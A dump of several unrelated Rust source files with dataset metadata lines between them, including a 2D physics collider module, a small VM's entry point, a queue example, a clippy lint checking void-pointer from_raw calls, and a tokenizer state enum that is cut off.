    pub fn restitution_combine_rule(&self) -> CoefficientCombineRule {
        *self.restitution_combine_rule
    }
    /// Returns an iterator that yields contact information for the collider.
    /// Contacts checks between two regular colliders
    pub fn contacts<'a>(
        &self,
        physics: &'a PhysicsWorld,
    ) -> impl Iterator<Item = ContactPair> + 'a {
        physics.contacts_with(self.native.get())
    }
    /// Returns an iterator that yields intersection information for the collider.
    /// Intersections checks between regular colliders and sensor colliders
    pub fn intersects<'a>(
        &self,
        physics: &'a PhysicsWorld,
    ) -> impl Iterator<Item = IntersectionPair> + 'a {
        physics.intersections_with(self.native.get())
    }
    /// Returns true if any physics-related property was modified since the last
    /// synchronization with the native physics representation; presumably checked
    /// by the sync pass (see `sync_native`) to decide whether the native collider
    /// must be updated.
    pub(crate) fn needs_sync_model(&self) -> bool {
        self.shape.need_sync()
            || self.friction.need_sync()
            || self.density.need_sync()
            || self.restitution.need_sync()
            || self.is_sensor.need_sync()
            || self.collision_groups.need_sync()
            || self.solver_groups.need_sync()
            || self.friction_combine_rule.need_sync()
            || self.restitution_combine_rule.need_sync()
    }
}
impl NodeTrait for Collider {
    crate::impl_query_component!();

    /// Returns the bounding box of the node in local coordinates (delegated to the base node).
    fn local_bounding_box(&self) -> AxisAlignedBoundingBox {
        self.base.local_bounding_box()
    }

    /// Returns the bounding box of the node in world coordinates (delegated to the base node).
    fn world_bounding_box(&self) -> AxisAlignedBoundingBox {
        self.base.world_bounding_box()
    }

    /// Returns the stable type UUID of [`Collider`].
    fn id(&self) -> Uuid {
        Self::type_uuid()
    }

    /// Destroys the native physics collider when the node leaves the graph and
    /// invalidates the cached native handle so it cannot be reused while stale.
    fn on_removed_from_graph(&mut self, graph: &mut Graph) {
        graph.physics2d.remove_collider(self.native.get());
        self.native.set(ColliderHandle::invalid());
        Log::info(format!(
            "Native collider 2D was removed for node: {}",
            self.name()
        ));
    }

    /// Pushes any modified collider properties down to the native physics representation.
    fn sync_native(&self, self_handle: Handle<Node>, context: &mut SyncContext) {
        context
            .physics2d
            .sync_to_collider_node(context.nodes, self_handle, self);
    }

    /// Verifies that the collider is a direct child of a 2D rigid body; a
    /// collider attached to anything else has no effect in the simulation.
    fn validate(&self, scene: &Scene) -> Result<(), String> {
        if scene
            .graph
            .try_get(self.parent())
            .and_then(|p| p.query_component_ref::<RigidBody>())
            .is_none()
        {
            // Fixed: this is the *2D* collider module (`dim2`), so the required
            // parent is a 2D rigid body — the message previously said "3D".
            Err(
                "2D Collider must be a direct child of a 2D Rigid Body node, \
                otherwise it will not have any effect!"
                    .to_string(),
            )
        } else {
            Ok(())
        }
    }
}
/// Collider builder allows you to build a collider node in declarative manner.
pub struct ColliderBuilder {
    // Builder for the base scene node this collider extends.
    base_builder: BaseBuilder,
    // Collision geometry of the collider.
    shape: ColliderShape,
    // Friction coefficient (0.0 = frictionless).
    friction: f32,
    // Optional density; `None` means the collider contributes zero mass.
    density: Option<f32>,
    // Coefficient of restitution (0.0 = no bounce).
    restitution: f32,
    // When true, the collider only reports intersections and takes no part
    // in collision response.
    is_sensor: bool,
    // Collision filtering groups.
    collision_groups: InteractionGroups,
    // Joint solver filtering groups.
    solver_groups: InteractionGroups,
    // Rule for combining friction of two touching colliders.
    friction_combine_rule: CoefficientCombineRule,
    // Rule for combining restitution of two touching colliders.
    restitution_combine_rule: CoefficientCombineRule,
}
impl ColliderBuilder {
    /// Creates new collider builder.
    ///
    /// Defaults: zero friction and restitution, no explicit density, not a
    /// sensor, default interaction groups and combine rules, default shape.
    pub fn new(base_builder: BaseBuilder) -> Self {
        Self {
            base_builder,
            shape: Default::default(),
            friction: 0.0,
            density: None,
            restitution: 0.0,
            is_sensor: false,
            collision_groups: Default::default(),
            solver_groups: Default::default(),
            friction_combine_rule: Default::default(),
            restitution_combine_rule: Default::default(),
        }
    }
    /// Sets desired shape of the collider.
    pub fn with_shape(mut self, shape: ColliderShape) -> Self {
        self.shape = shape;
        self
    }
    /// Sets desired density value.
    pub fn with_density(mut self, density: Option<f32>) -> Self {
        self.density = density;
        self
    }
    /// Sets desired restitution value.
    pub fn with_restitution(mut self, restitution: f32) -> Self {
        self.restitution = restitution;
        self
    }
    /// Sets desired friction value.
    pub fn with_friction(mut self, friction: f32) -> Self {
        self.friction = friction;
        self
    }
    /// Sets whether this collider will be used a sensor or not.
    pub fn with_sensor(mut self, sensor: bool) -> Self {
        self.is_sensor = sensor;
        self
    }
    /// Sets desired solver groups.
    pub fn with_solver_groups(mut self, solver_groups: InteractionGroups) -> Self {
        self.solver_groups = solver_groups;
        self
    }
    /// Sets desired collision groups.
    pub fn with_collision_groups(mut self, collision_groups: InteractionGroups) -> Self {
        self.collision_groups = collision_groups;
        self
    }
    /// Sets desired friction combine rule.
    pub fn with_friction_combine_rule(mut self, rule: CoefficientCombineRule) -> Self {
        self.friction_combine_rule = rule;
        self
    }
    /// Sets desired restitution combine rule.
    pub fn with_restitution_combine_rule(mut self, rule: CoefficientCombineRule) -> Self {
        self.restitution_combine_rule = rule;
        self
    }
    /// Creates collider node, but does not add it to a graph.
    pub fn build_collider(self) -> Collider {
        Collider {
            base: self.base_builder.build_base(),
            shape: self.shape.into(),
            friction: self.friction.into(),
            density: self.density.into(),
            restitution: self.restitution.into(),
            is_sensor: self.is_sensor.into(),
            collision_groups: self.collision_groups.into(),
            solver_groups: self.solver_groups.into(),
            friction_combine_rule: self.friction_combine_rule.into(),
            restitution_combine_rule: self.restitution_combine_rule.into(),
            native: Cell::new(ColliderHandle::invalid()),
        }
    }
    /// Wraps the built collider in a [`Node`], but does not add it to a graph.
    pub fn build_node(self) -> Node {
        Node::new(self.build_collider())
    }
    /// Creates collider node and adds it to the graph.
    pub fn build(self, graph: &mut Graph) -> Handle<Node> {
        graph.add_node(self.build_node())
    }
}
#[cfg(test)]
mod test {
    use crate::core::algebra::Vector2;
    use crate::scene::{
        base::BaseBuilder,
        dim2::{
            collider::{ColliderBuilder, ColliderShape},
            rigidbody::RigidBodyBuilder,
        },
        graph::Graph,
        rigidbody::RigidBodyType,
    };
    // Verifies the sensor semantics: a sensor and a regular collider placed at
    // the same spot must report an intersection but no contact.
    #[test]
    fn test_collider_2d_intersect() {
        let mut graph = Graph::new();
        // Spawns a static rigid body with a single cube collider at the origin
        // and returns the collider's handle.
        let mut create_rigid_body = |is_sensor| {
            let cube_half_size = 0.5;
            let collider_sensor = ColliderBuilder::new(BaseBuilder::new())
                .with_shape(ColliderShape::cuboid(cube_half_size, cube_half_size))
                .with_sensor(is_sensor)
                .build(&mut graph);
            RigidBodyBuilder::new(BaseBuilder::new().with_children(&[collider_sensor]))
                .with_body_type(RigidBodyType::Static)
                .build(&mut graph);
            collider_sensor
        };
        let collider_sensor = create_rigid_body(true);
        let collider_non_sensor = create_rigid_body(false);
        // need to call two times for the physics engine to execute
        graph.update(Vector2::new(800.0, 600.0), 1.0, Default::default());
        graph.update(Vector2::new(800.0, 600.0), 1.0, Default::default());
        // we don't expect contact between regular body and sensor
        assert_eq!(
            0,
            graph[collider_sensor]
                .as_collider2d()
                .contacts(&graph.physics2d)
                .count()
        );
        assert_eq!(
            0,
            graph[collider_non_sensor]
                .as_collider2d()
                .contacts(&graph.physics2d)
                .count()
        );
        // we expect intersection between regular body and sensor
        assert_eq!(
            1,
            graph[collider_sensor]
                .as_collider2d()
                .intersects(&graph.physics2d)
                .count()
        );
        assert_eq!(
            1,
            graph[collider_non_sensor]
                .as_collider2d()
                .intersects(&graph.physics2d)
                .count()
        );
    }
}
| true |
e8786bcf7489264861ba48adea032498397352c3
|
Rust
|
emmgame221/teenyat
|
/src/main.rs
|
UTF-8
| 1,476 | 2.96875 | 3 |
[
"MIT"
] |
permissive
|
mod arch;
mod assembler;
mod vm;
use std::env;
/// Entry point: dispatches on command-line arguments.
///
/// * `prog FILE`       — run FILE.
/// * `prog FILE -d`    — run FILE with the VM's debug mode enabled.
/// * `prog FILE -a`    — assemble FILE to a rom instead of running it.
/// * `prog` (no args)  — prompt for a file name on stdin and run it.
fn main() {
    let mut args = env::args().skip(1);
    match args.next() {
        Some(path) => match args.next().as_deref() {
            Some("-a") => assemble(path).unwrap(),
            Some("-d") => run(path, true).unwrap(),
            _ => run(path, false).unwrap(),
        },
        None => run(console_input(), false).unwrap(),
    }
}
/// Assembles the `.tat` source at `path` into a `.rom` file alongside it and
/// prints the assembled program.
fn assemble(path: String) -> std::io::Result<()> {
    let program = assembler::parse_file(&path)?;
    let rom_path = path.replace(".tat", ".rom");
    program.save_program(&rom_path)?;
    program.print_program();
    Ok(())
}
/// Prompts on stdout and reads a file name from stdin.
///
/// Returns the entered name with surrounding whitespace stripped. Trimming is
/// required: `read_line` keeps the trailing newline, which previously made the
/// `path.ends_with(".tat")` / `.ends_with(".rom")` checks in `run` always fail
/// for interactively entered paths.
fn console_input() -> String {
    println!("Enter the name of the file to run: ");
    let mut buf = String::new();
    std::io::stdin().read_line(&mut buf).unwrap();
    buf.trim().to_string()
}
/// Loads the program at `path` (assembling `.tat` sources on the fly, or
/// reading a prebuilt `.rom` image) and executes it in the TeenyAT VM.
///
/// Returns an `InvalidInput` error for any other file extension.
fn run(path: String, debug_mode: bool) -> std::io::Result<()> {
    let program = if path.ends_with(".tat") {
        assembler::parse_file(&path)?
    } else if path.ends_with(".rom") {
        arch::Memory::from_rom_file(&path)?
    } else {
        let err = std::io::Error::new(
            std::io::ErrorKind::InvalidInput,
            "Input file must be either an assembly file (.tat) or a rom file (.rom)",
        );
        return Err(err);
    };
    let mut machine = vm::TeenyAT::new(program);
    machine.debug_mode = debug_mode;
    machine.run()?;
    Ok(())
}
| true |
7f71ca2c15f6efb858c5a02ddfb0e9bbebfbb9b0
|
Rust
|
savish/queues
|
/examples/buf.rs
|
UTF-8
| 1,879 | 3.203125 | 3 |
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"Apache-2.0"
] |
permissive
|
extern crate queues;
use queues::{Buffer, IsQueue};
/// Walkthrough of typical `Buffer` usage: create a bounded buffer, fill it to
/// capacity, observe the errors on overflow/underflow, and peek at / remove
/// elements in FIFO order. Every operation is echoed to stdout with its result.
fn main() {
    println!("\nBuffer - typical usage");
    println!("--");
    println!("\nCreate a new empty buffer:");
    println!("let mut buf: Buffer<isize> = Buffer::new(3);");
    let mut buf: Buffer<isize> = Buffer::new(3);
    println!("\nAdd elements to it:");
    println!("buf.add(1);");
    println!("> {:?}", buf.add(1));
    println!("buf.add(-2);");
    println!("> {:?}", buf.add(-2));
    println!("buf.add(3);");
    println!("> {:?}", buf.add(3));
    println!("\nAttempt to add elements when full:");
    println!("buf.add(-4); // Should raise an error");
    println!("> {:?}", buf.add(-4));
    println!("\nCheck the buffer's size:");
    println!("buf.size(); // Should be 3");
    println!("> {}", buf.size());
    println!("\nRemove elements from it:");
    println!("buf.remove(); // Should be Ok(1)");
    println!("> {:?}", buf.remove());
    println!("\nCheck the buffer's size:");
    println!("buf.size(); // Should be 2");
    println!("> {}", buf.size());
    println!("\nPeek at the next element to be removed:");
    println!("buf.peek(); // Should be Ok(-2)");
    println!("> {:?}", buf.peek());
    println!("\nCheck the queue's size:");
    println!("buf.size(); // Should be 2");
    println!("> {}", buf.size());
    println!("\nRemove more elements from it:");
    println!("buf.remove(); // Should be Ok(-2)");
    println!("> {:?}", buf.remove());
    println!("buf.remove(); // Should be Ok(3)");
    println!("> {:?}", buf.remove());
    println!("\nPeek at the next element to be removed:");
    println!("buf.peek(); // Should raise an error");
    println!("> {:?}", buf.peek());
    println!("\nAttempt to remove elements from it:");
    println!("buf.remove(); // Should raise an error");
    println!("> {:?}", buf.remove());
    println!("\n--\n")
}
| true |
bcba4b201eeec09afcf7df490c425292e2b8023c
|
Rust
|
Aaron1011/clippy_bug
|
/src/main.rs
|
UTF-8
| 219 | 3.15625 | 3 |
[] |
no_license
|
// NOTE(review): judging by the repository name (clippy_bug) this is a minimized
// reproduction for a clippy/rustc diagnostics issue — the convoluted control
// flow is intentional and should not be "simplified".
fn main() {
    let mut a = true;
    loop {
        while a {
            // `if true` always fires: the first pass sets `a = false` and
            // `continue`s, ending the inner `while`; the `return` below is
            // therefore unreachable.
            if true {
                a = false;
                continue;
            }
            return;
        }
        // Once `a` is false the inner loop is skipped, so this prints on every
        // outer iteration — the program loops here forever.
        println!("Looping");
    }
}
| true |
75ed83cca0c75153a3057dcc1ecbd03c7efd5e64
|
Rust
|
daveduthie/exercism.io-exercises
|
/rust/beer-song/src/lib.rs
|
UTF-8
| 1,188 | 3.5 | 4 |
[] |
no_license
|
/// Formats the bottle count for a verse line ("no more bottles", "1 bottle",
/// "N bottles"). `capitalise` is used for the sentence-initial position.
fn unit(num: u32, capitalise: bool) -> String {
    match num {
        0 if capitalise => "No more bottles".to_string(),
        0 => "no more bottles".to_string(),
        1 => "1 bottle".to_string(),
        _ => format!("{} bottles", num),
    }
}

/// Chooses the pronoun for "Take … down": "it" for a single bottle, "one" otherwise.
fn determiner(num: u32) -> String {
    match num {
        1 => "it".to_string(),
        _ => "one".to_string(),
    }
}

/// Returns one verse of the song for `num` bottles, ending with a newline.
/// Verse 0 is the special "Go to the store" verse.
pub fn verse(num: u32) -> String {
    let prefix = format!(
        "{} of beer on the wall, {} of beer.\n",
        unit(num, true),
        unit(num, false)
    );
    let suffix = match num {
        0 => "Go to the store and buy some more, \
              99 bottles of beer on the wall.\n"
            .to_string(),
        _ => format!(
            "Take {} down and pass it around, {} of beer on the wall.\n",
            determiner(num),
            unit(num - 1, false)
        ),
    };
    prefix + &suffix
}

/// Returns the verses from `high` down to `low` (inclusive), separated by a
/// blank line. Uses an inclusive range instead of `low..(high + 1)`, which
/// also avoids overflow when `high == u32::MAX`.
pub fn sing(high: u32, low: u32) -> String {
    (low..=high)
        .rev()
        .map(verse)
        .collect::<Vec<String>>()
        .join("\n")
}
| true |
3dbb4742b486b35f1477643525b807af2c885a57
|
Rust
|
maccoda/cross-communication
|
/server/src/bin/basic_server_example.rs
|
UTF-8
| 4,166 | 2.59375 | 3 |
[
"MIT"
] |
permissive
|
extern crate chat_server;
extern crate grpc;
extern crate futures;
extern crate futures_cpupool;
extern crate protobuf;
use std::thread;
use futures_cpupool::CpuPool;
use grpc::{SingleResponse, StreamingResponse, StreamingRequest};
use chat_server::message_grpc::*;
use chat_server::message::*;
/// Thin wrapper around the generated protobuf `Room` message used as the
/// server's internal room representation.
#[derive(PartialEq)]
struct MsgRoom(Room);

impl MsgRoom {
    /// Name of the wrapped room.
    fn name(&self) -> &str {
        self.0.get_name()
    }

    /// Builds a wrapped room carrying the given name.
    fn from(name: &str) -> MsgRoom {
        let mut inner = Room::new();
        inner.set_name(String::from(name));
        MsgRoom(inner)
    }
}
/// In-memory implementation of the generated `Communicator` gRPC service.
struct CommunicatorImpl {
    // NOTE This is just the basic implementation, a map or some sorted structure may be better
    // NOTE Would also need to have access to the database of conversation history
    // Rooms currently known to the server; looked up by name.
    conversations: Vec<MsgRoom>,
}
impl CommunicatorImpl {
    /// Creates the service with a single hard-coded room named "cross_comm".
    fn new() -> CommunicatorImpl {
        CommunicatorImpl { conversations: vec![MsgRoom::from("cross_comm")] }
    }
}
impl Communicator for CommunicatorImpl {
    /// Opens a conversation in the requested room. Succeeds only when exactly
    /// one known room matches the requested room name; otherwise replies with
    /// an error response.
    fn initiate_conversation(&self,
                             options: ::grpc::RequestOptions,
                             req: InitiateRequest)
                             -> SingleResponse<InitiateReply> {
        let mut reply = InitiateReply::new();
        println!("Received an initiate command from {:?}",
                 req.get_clientAddress());
        println!("They wish to connect with {:?}", req.get_room());
        let matches: Vec<&MsgRoom> = self.conversations
            .iter()
            .filter(|x| x.name() == req.get_room().get_name())
            .collect();
        if matches.len() != 1 {
            SingleResponse::err(grpc::error::Error::Other("Room unavailable to open"))
        } else {
            reply.set_success(true);
            SingleResponse::completed(reply)
        }
    }
    /// Ends a conversation. Mirrors `initiate_conversation`: requires exactly
    /// one room with the requested name, otherwise replies with an error.
    fn terminate_conversation(&self,
                              options: ::grpc::RequestOptions,
                              req: TerminateRequest)
                              -> SingleResponse<TerminateReply> {
        let mut reply = TerminateReply::new();
        println!("Received a terminate command from {:?}",
                 req.get_clientAddress());
        let req_id = req.get_room();
        println!("They wish to end their conversation with {:?}", req_id);
        // First check that the conversation can be ended
        let matches: Vec<&MsgRoom> = self.conversations
            .iter()
            .filter(|x| x.name() == req.get_room().get_name())
            .collect();
        if matches.len() != 1 {
            SingleResponse::err(grpc::error::Error::Other("Conversation not yet open. Incorrect \
                                                           conversation ID"))
        } else {
            // matches[0].clear();
            reply.set_success(true);
            SingleResponse::completed(reply)
        }
    }
    /// Streams messages. Currently ignores the incoming request stream and
    /// replies with ten mock messages from a fixed "remote" address.
    fn send_message(&self,
                    options: ::grpc::RequestOptions,
                    reqs: StreamingRequest<MessageRequest>)
                    -> StreamingResponse<MessageReply> {
        // FIXME Unsure of how to make mock of the iterator
        let mut msgs = vec![];
        for i in 0..10 {
            let mut reply = Message::new();
            reply.set_content(format!("Message {}", i));
            reply.set_user(make_address());
            msgs.push(reply);
        }
        let mut reply = MessageReply::new();
        reply.set_messages(::protobuf::RepeatedField::from_vec(msgs));
        StreamingResponse::completed(vec![reply])
    }
}
/// Builds the placeholder "remote" `Address` used for mock message replies.
fn make_address() -> Address {
    let mut address = Address::new();
    address.set_address(String::from("remote"));
    address
}
#[allow(unused_variables)]
fn main() {
    // Create the server, need unused variable so doesn't get disposed of
    // (dropping the handle would shut the server down).
    let server = CommunicatorServer::new_pool("[::]:50051",
                                              Default::default(),
                                              CommunicatorImpl::new(),
                                              CpuPool::new(4));
    println!("Server started");
    // Keep the main thread alive indefinitely; `park` may wake spuriously,
    // hence the loop.
    loop {
        thread::park();
    }
}
| true |
04e2cc5f75c84cbea4e80139411a0364c57a45a9
|
Rust
|
INTENDRO/learning_rust
|
/loops/src/main.rs
|
UTF-8
| 1,128 | 3.984375 | 4 |
[] |
no_license
|
// fn main() {
// loop{
// println!("again!");
// }
// }
// fn main() {
// let mut counter = 0;
// let result = loop {
// counter += 1;
// if counter == 10 {
// break counter * 2;
// }
// };
// println!("result = {}", result);
// }
// fn main() {
// let mut number = 3;
// while number != 0 {
// println!("{}", number);
// number -= 1;
// }
// println!("LIFTOFF!!");
// }
// fn main() {
// let arr = [10,20,30,40,50];
// let mut ind = 0;
// println!("iterating over array using while-loop");
// while ind < 5 {
// println!("{}", arr[ind]);
// ind += 1;
// }
// println!("done");
// }
// fn main() {
// let arr = [10,20,30,40,50];
// println!("iterating over array using for-loop");
// for element in arr.iter() {
// println!("{}", element);
// }
// println!("done");
// }
/// Counts down from 3 to 1 by reversing an ascending range, then announces liftoff.
fn main() {
    // Fixed typo in the user-facing message: "interating" -> "iterating".
    println!("iterating using for-loop and range");
    for number in (1..4).rev() {
        println!("{}", number);
    }
    println!("LIFTOFF!!");
}
| true |
695c8e8c028256d1355f930379afdb6fbd9d1481
|
Rust
|
rust-lang/rust
|
/src/tools/clippy/clippy_lints/src/from_raw_with_void_ptr.rs
|
UTF-8
| 3,158 | 2.90625 | 3 |
[
"Apache-2.0",
"MIT",
"LLVM-exception",
"NCSA",
"BSD-2-Clause",
"LicenseRef-scancode-unicode",
"LicenseRef-scancode-other-permissive"
] |
permissive
|
use clippy_utils::diagnostics::span_lint_and_help;
use clippy_utils::ty::is_c_void;
use clippy_utils::{match_def_path, path_def_id, paths};
use rustc_hir::def_id::DefId;
use rustc_hir::{Expr, ExprKind, QPath};
use rustc_lint::{LateContext, LateLintPass};
use rustc_middle::ty::{RawPtr, TypeAndMut};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::sym;
declare_clippy_lint! {
    /// ### What it does
    /// Checks if we're passing a `c_void` raw pointer to `{Box,Rc,Arc,Weak}::from_raw(_)`
    ///
    /// ### Why is this bad?
    /// When dealing with `c_void` raw pointers in FFI, it is easy to run into the pitfall of calling `from_raw` with the `c_void` pointer.
    /// The type signature of `Box::from_raw` is `fn from_raw(raw: *mut T) -> Box<T>`, so if you pass a `*mut c_void` you will get a `Box<c_void>` (and similarly for `Rc`, `Arc` and `Weak`).
    /// For this to be safe, `c_void` would need to have the same memory layout as the original type, which is often not the case.
    ///
    /// ### Example
    /// ```rust
    /// # use std::ffi::c_void;
    /// let ptr = Box::into_raw(Box::new(42usize)) as *mut c_void;
    /// let _ = unsafe { Box::from_raw(ptr) };
    /// ```
    /// Use instead:
    /// ```rust
    /// # use std::ffi::c_void;
    /// # let ptr = Box::into_raw(Box::new(42usize)) as *mut c_void;
    /// let _ = unsafe { Box::from_raw(ptr as *mut usize) };
    /// ```
    ///
    #[clippy::version = "1.67.0"]
    pub FROM_RAW_WITH_VOID_PTR,
    suspicious,
    "creating a `Box` from a void raw pointer"
}
// Registers `FromRawWithVoidPtr` as a stateless lint pass emitting the lint above.
declare_lint_pass!(FromRawWithVoidPtr => [FROM_RAW_WITH_VOID_PTR]);
impl LateLintPass<'_> for FromRawWithVoidPtr {
    // Fires on expressions of the form `Type::from_raw(arg)` where `Type`
    // resolves to `Box`/`Rc`/`Arc`/`Weak` and `arg`'s type is a raw pointer
    // to `c_void`.
    fn check_expr(&mut self, cx: &LateContext<'_>, expr: &Expr<'_>) {
        if let ExprKind::Call(box_from_raw, [arg]) = expr.kind
        && let ExprKind::Path(QPath::TypeRelative(ty, seg)) = box_from_raw.kind
        && seg.ident.name == sym!(from_raw)
        && let Some(type_str) = path_def_id(cx, ty).and_then(|id| def_id_matches_type(cx, id))
        && let arg_kind = cx.typeck_results().expr_ty(arg).kind()
        && let RawPtr(TypeAndMut { ty, .. }) = arg_kind
        && is_c_void(cx, *ty) {
            let msg = format!("creating a `{type_str}` from a void raw pointer");
            span_lint_and_help(cx, FROM_RAW_WITH_VOID_PTR, expr.span, &msg, Some(arg.span), "cast this to a pointer of the appropriate type");
        }
    }
}
/// Checks whether a `DefId` matches `Box`, `Rc`, `Arc`, or one of the `Weak` types.
/// Returns a static string slice with the name of the type, if one was found.
fn def_id_matches_type(cx: &LateContext<'_>, def_id: DefId) -> Option<&'static str> {
    // `Box` is a lang item rather than a diagnostic item.
    if cx.tcx.lang_items().owned_box() == Some(def_id) {
        return Some("Box");
    }
    // `Rc` and `Arc` are identified via their diagnostic names.
    if let Some(name) = cx.tcx.get_diagnostic_name(def_id) {
        if name == sym::Arc {
            return Some("Arc");
        }
        if name == sym::Rc {
            return Some("Rc");
        }
    }
    // Both `rc::Weak` and `sync::Weak` are reported under the same label.
    let is_weak =
        match_def_path(cx, def_id, &paths::WEAK_RC) || match_def_path(cx, def_id, &paths::WEAK_ARC);
    is_weak.then_some("Weak")
}
| true |
62856fafc93a8c2cc35045f6c04af72381b8082d
|
Rust
|
l1h3r/kraken-rs
|
/src/client/path.rs
|
UTF-8
| 659 | 3.421875 | 3 |
[] |
no_license
|
/// A request path with an incrementally-built query string.
#[derive(Clone, Debug)]
#[repr(transparent)]
pub struct Path(String);

impl Path {
    /// Creates a `Path` from the given base path.
    #[inline(always)]
    pub fn new(path: &str) -> Self {
        Self(path.to_owned())
    }

    /// Returns the accumulated path (including any query string) as a slice.
    #[inline(always)]
    pub fn as_str(&self) -> &str {
        self.0.as_str()
    }

    /// Appends one `key=value` query parameter, starting the query string with
    /// `?` on first use and separating subsequent parameters with `&`.
    pub fn add<K: AsRef<str>, V: AsRef<str>>(&mut self, key: K, value: V) {
        let separator = if self.0.contains('?') { '&' } else { '?' };
        self.0.push(separator);
        self.0.push_str(key.as_ref());
        self.0.push('=');
        self.0.push_str(value.as_ref());
    }

    /// Appends `key=a,b,c` built from `slice`; an empty slice adds nothing.
    pub fn add_slice<K: AsRef<str>>(&mut self, key: K, slice: &[&str]) {
        if slice.is_empty() {
            return;
        }
        self.add(key, slice.join(","));
    }
}
| true |
db8eb26f3f9ea04768e715726bb3274e039e1426
|
Rust
|
p-avital/any-error
|
/src/lib.rs
|
UTF-8
| 3,442 | 3.65625 | 4 |
[] |
no_license
|
#![feature(optin_builtin_traits)]
use core::any::Any;
/// A convenient 0-sized Error type that implements From<Type> and Into<Type: Default>.
/// Useful for when you only really care that "some error happened, and I want to use `?` to handle it"
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
pub struct SomeError;
// Auto trait implemented for every type *except* `SomeError` itself (see the
// negative impl below). It lets the blanket `From<T> for SomeError` exclude
// `T = SomeError`, which would otherwise overlap with core's reflexive
// `impl<T> From<T> for T`. Requires nightly (`optin_builtin_traits`).
pub auto trait NotSomeError {}
impl !NotSomeError for SomeError {}
impl Default for SomeError {
    fn default() -> Self {
        SomeError
    }
}
// Blanket conversion: any non-`SomeError` value collapses into the unit error,
// which is what makes `?` work in functions returning `Result<_, SomeError>`.
impl<T: NotSomeError> From<T> for SomeError {
    fn from(_: T) -> SomeError {
        SomeError
    }
}
/// An error that implements From<Type: Debug>
/// Useful for when you still want to keep some error messages, but really want to use `?`
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct FormattedError(pub String);
// Opt-out auto trait: excludes `FormattedError` itself from the blanket `From`
// below so it cannot conflict with core's reflexive `From` impl.
pub auto trait NotFormattedError {}
impl !NotFormattedError for FormattedError {}
impl FormattedError {
    /// Creates a `FormattedError` carrying a copy of the given message.
    pub fn new(string: &str) -> Self {
        FormattedError(string.to_owned())
    }
}
impl Default for FormattedError {
    fn default() -> Self {
        FormattedError::new("Default FormattedError")
    }
}
// Any `Debug` error is captured by rendering its debug representation into
// the carried message.
impl<T: core::fmt::Debug + NotFormattedError> From<T> for FormattedError {
    fn from(t: T) -> FormattedError {
        FormattedError(format!("{:?}", t))
    }
}
/// When you may want to return various error types,
/// but are too lazy to use an enum and implement From for Everything.
pub struct AnyError(pub Box<dyn Any>);
// Opt-out auto trait: everything except `AnyError` itself implements it, so
// the blanket `From` below does not overlap with core's reflexive `From`.
pub auto trait NotAnyError {}
impl !NotAnyError for AnyError {}
impl Default for AnyError {
    fn default() -> Self {
        // The boxed payload of the default error is the unit value `()`.
        ().into()
    }
}
// Any `Any`-compatible (i.e. `'static`) value can be boxed up as an `AnyError`.
impl<T: NotAnyError + Any> From<T> for AnyError {
    fn from(t: T) -> AnyError {
        AnyError(Box::new(t) as Box<dyn Any>)
    }
}
impl AnyError {
    /// Attempts to downcast the boxed payload to `T`; on failure the original
    /// error is returned unchanged so another downcast can be attempted.
    pub fn downcast<T: Any>(self) -> Result<T, Self> {
        match self.0.downcast::<T>() {
            Ok(t) => Ok(*t),
            Err(e) => Err(AnyError(e)),
        }
    }
}
#[cfg(test)]
mod test {
    use crate::{AnyError, FormattedError, SomeError};
    // Source error used by all tests; implements only `Debug` (with a fixed
    // representation) so the blanket `From` impls above apply to it.
    struct FormatableError;
    impl core::fmt::Debug for FormatableError {
        fn fmt(&self, f: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> {
            write!(f, "FormatableErrorDebug")
        }
    }
    // Returns Ok(()) when `ok` is true, otherwise the custom error.
    fn unit_or_formatable_error(ok: bool) -> Result<(), FormatableError> {
        match ok {
            true => Ok(()),
            false => Err(FormatableError),
        }
    }
    // `?` converts `FormatableError` into the 0-sized `SomeError`.
    #[test]
    fn some_test() {
        let test = |ok| -> Result<(), SomeError> { Ok(unit_or_formatable_error(ok)?) };
        assert_eq!(test(true), Ok(()));
        assert_eq!(test(false), Err(SomeError));
    }
    // `?` converts via `Debug`, preserving the message text.
    #[test]
    fn formatted_test() {
        let test = |ok| -> Result<(), FormattedError> { Ok(unit_or_formatable_error(ok)?) };
        assert_eq!(test(true), Ok(()));
        assert_eq!(
            test(false),
            Err(FormattedError("FormatableErrorDebug".to_owned()))
        );
    }
    // `?` boxes the error; the original type can be recovered by downcasting.
    #[test]
    fn any_test() {
        let test = |ok| -> Result<(), AnyError> { Ok(unit_or_formatable_error(ok)?) };
        assert!(test(true).is_ok());
        match test(false) {
            Ok(_) => panic!("test(false) should never be Ok(_)"),
            Err(error) => match error.0.downcast::<FormatableError>() {
                Ok(downcasted) => println!("Successfully Downcasted: {:?}", downcasted),
                Err(_) => panic!("Couldn't downcast after boxing in AnyError"),
            },
        }
    }
}
| true |
80badab3a5632d5466899430f16a9cb7639be7ba
|
Rust
|
foxfriends/gmlpp
|
/src/gmlpp/tokenizer/state.rs
|
UTF-8
| 16,630 | 3.578125 | 4 |
[] |
no_license
|
use error::Error;
#[derive(Clone, Copy, PartialEq, Eq, Debug)]
pub enum State {
Start,
// comments
SlashSlash,
SlashSlashSlash,
LineComment,
DocComment,
SlashStar(u8),
SlashStarSlash(u8),
SlashStarStar(u8),
// numbers
Zero,
ZeroX,
ZeroB,
Hex,
Bin,
Dec,
DecFloat,
DecE,
DecEMinus,
DecExp,
// strings
CharStart,
CharX,
CharSlash,
Char,
StrStart,
StrSlash,
Str,
// arithmetic operators
Minus,
Plus,
PlusEqual,
MinusEqual,
Star,
StarStar,
Slash,
Percent,
StarEqual,
StarStarEqual,
SlashEqual,
PercentEqual,
PlusPlus,
MinusMinus,
// comparison operators
Equal,
EqualEqual,
NotEqual,
Less,
LessEqual,
More,
MoreEqual,
// boolean operators
And,
AndAnd,
Bar,
BarBar,
Xor,
AndEqual,
BarEqual,
XorEqual,
Tilde,
Bang,
LShift,
LShiftEqual,
RShift,
RShiftEqual,
// symbols
Question,
Colon,
Hash,
At,
Underscore,
BarMore,
Dot,
Comma,
Semi,
DotDot,
DotDotDot,
// preprocessor
HashM,
HashMa,
HashMac,
HashMacr,
HashMacro,
HashP,
HashPr,
HashPra,
HashPrag,
HashPragm,
HashPragma,
// whitespace
EOL,
// brackets
LParen,
RParen,
LBrack,
RBrack,
LBrace,
RBrace,
// identifier
Identifier,
}
impl Default for State {
    /// The tokenizer begins every token in the `Start` state.
    fn default() -> Self {
        State::Start
    }
